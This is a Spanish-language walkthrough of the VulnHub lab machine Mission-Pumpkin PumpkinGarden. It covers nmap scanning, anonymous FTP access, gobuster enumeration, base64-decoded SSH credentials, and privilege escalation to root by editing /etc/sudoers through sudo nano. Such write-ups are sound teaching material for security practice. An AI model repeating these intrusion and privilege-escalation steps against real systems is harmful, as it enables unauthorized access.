__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hello@lacashita.com

 
 [VULNHUB] Mission-Pumpkin v1.0: PumpkinGarden [1]

NMAP
-----

Empezamos haciendo nmap para ver que puertos tiene abiertos.

..[sml@cassandra].[~]
.... $nmap -A -p- 192.168.20.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 18:45 CEST
Nmap scan report for 192.168.20.153
Host is up (0.00039s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.20.152
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.26 seconds

FTP
---

Nos conectamos al FTP con el usuario "anonymous" y nos descargamos el unico fichero
que hay (note.txt).

..[sml@cassandra].[~]
.... $ftp 192.168.20.153
Connected to 192.168.20.153.
220 Welcome to Pumpkin's FTP service.
Name (192.168.20.153:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (1.0490 MB/s)
ftp> 


Miramos el contenido del fichero.

..[sml@cassandra].[~]
.... $cat note.txt 
Hello Dear! 
Looking for route map to PumpkinGarden? I think jack can help you find it.

HTTP
----

Utilizamos gobuster para ver si encontramos algo interesante en el servidor web.

..[.].[sml@cassandra].[~]
.... $gobuster -w /usr/share/wordlists/dirb/small.txt -u http://192.168.20.153:1515

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.20.153:1515/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/07 19:04:28 Starting gobuster
=====================================================
/img (Status: 301)
=====================================================
2019/07/07 19:04:28 Finished
=====================================================


Visitamos http://192.168.20.153:1515/img/hidden_secret/clue.txt
Contiene: c2NhcmVjcm93IDogNVFuQCR5

Hacemos el decode del contenido de clue.txt, esta en base64.

.[sml@cassandra].[~]
.... $echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$y

Obtenemos los credenciales para poder conectarnos por ssh.

LOW SHELL
---------

..[sml@cassandra].[~]
.... $ssh -p 3535 scarecrow@192.168.20.153
------------------------------------------------------------------------------
			  Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
scarecrow@192.168.20.153's password: 
Last login: Sun Jul  7 22:20:54 2019 from 192.168.20.152
scarecrow@Pumpkin:~$ id
uid=1001(scarecrow) gid=1001(scarecrow) groups=1001(scarecrow)
scarecrow@Pumpkin:~$ 

scarecrow@Pumpkin:~$ cat note.txt 

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! 
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

Utilizamos el "password" para loguearnos como goblin.

scarecrow@Pumpkin:~$ su goblin
Password: 
goblin@Pumpkin:/home/scarecrow$ 

goblin@Pumpkin:~$ sudo -l
[sudo] password for goblin: 
Matching Defaults entries for goblin on Pumpkin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goblin may run the following commands on Pumpkin:
    (root) ALL, !/bin/su

El usuario goblin puede usar todo con sudo excepto el comando su.
Vamos a editar /etc/sudoers para que el usuario goblin pueda usar
todos los comandos, incluido el su.

Cambiaremos esta linea %sudo ALL=ALL, !/bin/su por %sudo ALL=ALL.

goblin@Pumpkin:~$ sudo nano /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=ALL, !/bin/su

Una vez editado el fichero.

goblin@Pumpkin:~$ sudo su
root@Pumpkin:/home/goblin# id
uid=0(root) gid=0(root) groups=0(root)

root@Pumpkin:~# cat PumpkinGarden_Key 
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# echo Q29uZ3JhdHVsYXRpb25zIQ== | base64 -d
Congratulations!
root@Pumpkin:~#


[1] https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/